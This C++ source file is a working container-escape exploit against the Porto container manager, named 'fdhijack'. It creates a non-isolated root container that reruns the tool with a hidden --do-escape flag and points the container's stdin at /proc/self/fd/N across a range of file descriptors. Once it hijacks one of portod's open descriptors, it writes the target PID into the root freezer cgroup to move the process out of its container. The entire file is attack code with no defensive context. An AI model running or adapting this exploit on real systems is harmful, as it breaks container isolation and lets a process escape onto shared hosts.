#include <util/folder/path.h>
#include <util/system/fstat.h>
#include <util/stream/file.h>
#include <util/datetime/base.h>
#include <library/cpp/getopt/last_getopt.h>
#include <library/cpp/logger/log.h>
#include <library/cpp/logger/stream.h>
#include <infra/porto/api/libporto.hpp>


namespace {
    TLog logger{MakeHolder<TStreamLogBackend>(&Cerr)};

    void setupLogger() {
        logger.SetFormatter([](ELogPriority priority, TStringBuf line) {
            Y_UNUSED(priority);

            TStringBuilder out;
            out << "[" << TInstant::Now().FormatLocalTime("%H:%M:%S") << "] " << line;
            return out;
        });
    }

    TString prepareContainer(Porto::TPortoApi &api, size_t targetPid) {
        auto containerName = "self/fdhijack-" + ToString(Now().ToString());
        Porto::TContainerSpec container;
        container.set_weak(true);
        container.set_name(containerName);
        container.set_isolate(false);
        container.set_user("root");
        container.set_stderr_path("/dev/fd/2");
        container.set_command(
                TFsPath("/proc/self/exe").ReadLink().GetPath() +
                " --target-pid=" + ToString(targetPid) +
                " --do-escape"
        );

        auto err = api.CreateFromSpec(container, {});
        if (err != Porto::EError::Success) {
            throw yexception() << "can't create container: " << api.GetLastError() << Endl;
        }

        return containerName;
    }

    bool tryAttack(Porto::TPortoApi &api, const TString &containerName, size_t fd) {
        (void) api.Stop(containerName);
        auto err = api.SetProperty(containerName, "stdin_path", "/proc/self/fd/" + ToString(fd));
        if (err != Porto::EError::Success) {
            throw yexception() << "can't update container: " << api.GetLastError() << Endl;
        }

        err = api.Start(containerName);
        if (err != Porto::EError::Success) {
            throw yexception() << "can't start container: " << api.GetLastError() << Endl;
        }

        TString tmp;
        err = api.WaitContainer(containerName, tmp);
        if (err != Porto::EError::Success) {
            throw yexception() << "can't wait container: " << api.GetLastError() << Endl;
        }

        err = api.GetProperty(containerName, "stdout", tmp);
        if (err != Porto::EError::Success) {
            throw yexception() << "can't read container stdout: " << api.GetLastError() << Endl;
        }

        return tmp == "OK";
    }

    void doEscape(size_t targetPid) {
        if (!TFileStat("/dev/stdin/portod/freezer.state").IsFile()) {
            throw yexception() << "file '/dev/stdin/portod/freezer.state' not found";
        }

        TUnbufferedFileOutput out("/dev/stdin/tasks");
        out << ToString(targetPid);
        out.Finish();
    }
}


int main(int argc, char **argv) {
    setupLogger();

    NLastGetopt::TOpts opts = NLastGetopt::TOpts::Default();
    size_t fromFd = 1;
    size_t toFd = 150;
    int targetPid = getppid();

    opts.AddLongOption("from-fd", "fd to start search")
            .DefaultValue(fromFd)
            .StoreResult(&fromFd);

    opts.AddLongOption("to-fd", "last fd to search")
            .DefaultValue(toFd)
            .StoreResult(&toFd);

    opts.AddLongOption("target-pid", "pid to escape")
            .Optional()
            .StoreResult(&targetPid);

    opts.AddLongOption("do-escape", "escape from container")
            .NoArgument()
            .Hidden();

    NLastGetopt::TOptsParseResult args(&opts, argc, argv);

    if (args.Has("do-escape")) {
        try {
            doEscape(targetPid);
            Cout << "OK";
        } catch (const yexception &e) {
            Cerr << "can't escape: " << e.what() << Endl;
        }

        return 1;
    }

    Porto::TPortoApi api;
    auto containerName = prepareContainer(api, targetPid);
    logger << TLOG_INFO << "container created: " << containerName << "\n";

    for (size_t fd = fromFd; fd <= toFd; ++fd) {
        try {
            logger << TLOG_INFO << "try fd: " << fd << "\n";
            bool ok = tryAttack(api, containerName, fd);
            if (!ok) {
                continue;
            }

            Cout << "Yay! Moved pid " << targetPid << " to root freezer cgroup with fd " << fd << Endl;
            return 0;
        } catch (const yexception &e) {
            logger << TLOG_INFO << "fail: " << e.what() << Endl;
        }
    }

    Cout << "`¯\\_(⊙︿⊙)_/¯`" << Endl;
    return 0;
}
